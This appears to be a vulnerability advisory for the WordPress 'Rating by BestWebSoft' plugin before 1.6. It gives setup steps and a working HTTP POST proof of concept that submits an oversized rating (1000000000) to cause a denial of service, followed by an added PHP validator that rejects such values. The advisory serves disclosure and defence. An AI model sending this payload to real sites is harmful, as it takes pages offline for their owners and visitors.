WordPress Plugin Vulnerabilities

Rating by BestWebSoft < 1.6 - Rating Denial of Service

Description

The plugin does not validate the submitted rating, allowing submission of a long integer, which causes a Denial of Service on the post/page when a user submits such a rating.

Proof of Concept

Under Settings -> Discussion, uncheck "Comment must be manually approved".
Install and enable the Rating BestWebSoft plugin.
Change "Enable Rating for" to "All" (works for others, but this allows guests to post).
Change "My Rating Position" to "In comments".
Submit a valid comment and capture the request with Burp or another application.
Change the POST parameter "rtng_rating[0]" to a large integer such as 1000000000.

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Connection: close
Cookie: [depends on plugin's settings]
Upgrade-Insecure-Requests: 1

rtng_show_title=1&rtng_rating%5B0%5D=1000000000&comment=aa&author=Yolo&email=krkgh%40jgoirtjg.com&url=&submit=Post+Comment&comment_post_ID=5887&comment_parent=0
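
A server-side check that would reject the request above, shown as an added example and not the plugin's own code or the actual 1.6 fix. The 1 to 5 rating range, the constant names and the function name are assumptions; the two form bodies are constructed samples, the first shortened from the request above.

```php
<?php
// Added example, not the plugin's code.
// Assumption: ratings are whole stars in the range 1..5.
const RTNG_EXAMPLE_MIN = 1;
const RTNG_EXAMPLE_MAX = 5;

/**
 * Validate every rtng_rating[] value in a submitted form.
 * Returns the ratings as integers, or null if the field is missing,
 * is not an array, or any value is not an integer inside the allowed range.
 */
function rtng_example_validate_ratings(array $form): ?array
{
    if (!isset($form['rtng_rating']) || !is_array($form['rtng_rating'])) {
        return null;
    }

    $clean = [];
    foreach ($form['rtng_rating'] as $index => $raw) {
        // Reject nested arrays such as rtng_rating[0][]=1 before filtering.
        if (!is_scalar($raw)) {
            return null;
        }
        // FILTER_VALIDATE_INT rejects non-numeric strings, floats and
        // anything outside min_range..max_range, returning false.
        $value = filter_var($raw, FILTER_VALIDATE_INT, [
            'options' => [
                'min_range' => RTNG_EXAMPLE_MIN,
                'max_range' => RTNG_EXAMPLE_MAX,
            ],
        ]);
        if ($value === false) {
            return null; // refuse the whole submission, store nothing
        }
        $clean[(int) $index] = $value;
    }
    return $clean;
}

// Constructed sample bodies: the oversized rating, then an in-range one.
parse_str('rtng_show_title=1&rtng_rating%5B0%5D=1000000000&comment=aa', $oversized);
parse_str('rtng_show_title=1&rtng_rating%5B0%5D=4&comment=aa', $in_range);

var_dump(rtng_example_validate_ratings($oversized));
var_dump(rtng_example_validate_ratings($in_range));
```

The same bounds check belongs wherever a stored rating is read back for display, so that values saved before the validation was added cannot reach the rendering code.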

Affects Plugins

Fixed in 1.6

Miscellaneous

Original Researcher
Drew Jones
Submitter
Drew Jones
Verified
Yes

Timeline

Publicly Published
2022-05-24
Added
2022-05-24
Last Updated
2023-02-20
